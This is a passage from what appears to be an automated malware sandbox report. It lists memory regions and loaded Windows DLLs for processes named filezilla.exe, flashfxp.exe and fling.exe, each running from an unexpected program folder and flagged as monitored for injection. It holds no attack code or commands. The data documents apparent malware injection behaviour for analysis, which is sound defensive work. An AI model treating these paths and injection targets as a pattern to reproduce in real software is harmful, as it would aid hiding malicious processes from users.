= 3018 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3019 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3020 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3021 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3022 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3023 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3024 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3025 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3026 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3027 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3028 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3029 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3030 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3031 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3032 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3033 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3034 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3035 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3036 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3037 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3038 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3039 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3040 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3041 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3042 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3044 start_va = 0x28f0000 end_va = 0x2a81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028f0000" filename = "" Thread: id = 169 os_tid = 0xbf8 Process: id = "19" image_name = "filezilla.exe" filename = "c:\\program files (x86)\\microsoft office\\filezilla.exe" page_root = "0x4c7d2000" os_pid = "0xbfc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\filezilla.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3045 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3046 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3047 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3048 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3049 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3050 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3051 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3052 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3053 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3054 start_va = 0x270000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 3055 start_va = 0x370000 end_va = 0x4f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 3056 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3057 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3058 start_va = 0x5e0000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 3059 start_va = 0x770000 end_va = 0x84efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3060 start_va = 0x8b0000 end_va = 0x8c6fff monitored = 0 entry_point = 0x8b14a1 region_type = mapped_file name = "filezilla.exe" filename = "\\Program Files (x86)\\Microsoft Office\\filezilla.exe" (normalized: "c:\\program files (x86)\\microsoft office\\filezilla.exe") Region: id = 3061 start_va = 0xac0000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 3062 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 3063 start_va = 0x1fc0000 end_va = 0x2983fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fc0000" filename = "" Region: id = 3064 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3065 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3066 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3067 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3068 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3069 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3070 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3071 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3072 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3073 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3074 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3075 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3076 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3077 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3078 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3079 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3080 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3081 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3082 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3083 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3084 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3085 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3086 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3087 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3088 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3089 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3090 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3091 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3092 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3093 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3094 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3095 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3097 start_va = 0x8d0000 end_va = 0xa7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Thread: id = 170 os_tid = 0x75c Process: id = "20" image_name = "flashfxp.exe" filename = "c:\\program files\\msbuild\\flashfxp.exe" page_root = "0x4dbd8000" os_pid = "0x634" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\MSBuild\\flashfxp.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3099 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3100 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3101 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3102 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3103 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3104 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3105 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3106 start_va = 0xe0000 end_va = 0x1befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3107 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3108 start_va = 0x2f0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3109 start_va = 0x4f0000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3110 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 3111 start_va = 0x880000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 3112 start_va = 0x8b0000 end_va = 0x8c6fff monitored = 0 entry_point = 0x8b14a1 region_type = mapped_file name = "flashfxp.exe" filename = "\\Program Files\\MSBuild\\flashfxp.exe" (normalized: "c:\\program files\\msbuild\\flashfxp.exe") Region: id = 3113 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 3114 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 3115 start_va = 0xbf0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 3116 start_va = 0x1ff0000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 3117 start_va = 0x2160000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 3118 start_va = 0x21a0000 end_va = 0x2b63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 3119 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3120 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3121 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3122 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3123 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3124 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3125 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3126 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3127 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3128 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3129 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3130 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3131 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3132 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3133 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3134 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3135 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3136 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3137 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3138 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3139 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3140 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3141 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3142 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3143 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3144 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3145 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3146 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3147 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3148 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3149 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3150 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 171 os_tid = 0x318 Process: id = "21" image_name = "fling.exe" filename = "c:\\program files (x86)\\windows sidebar\\fling.exe" page_root = "0x4d9de000" os_pid = "0x4fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\fling.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3158 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id 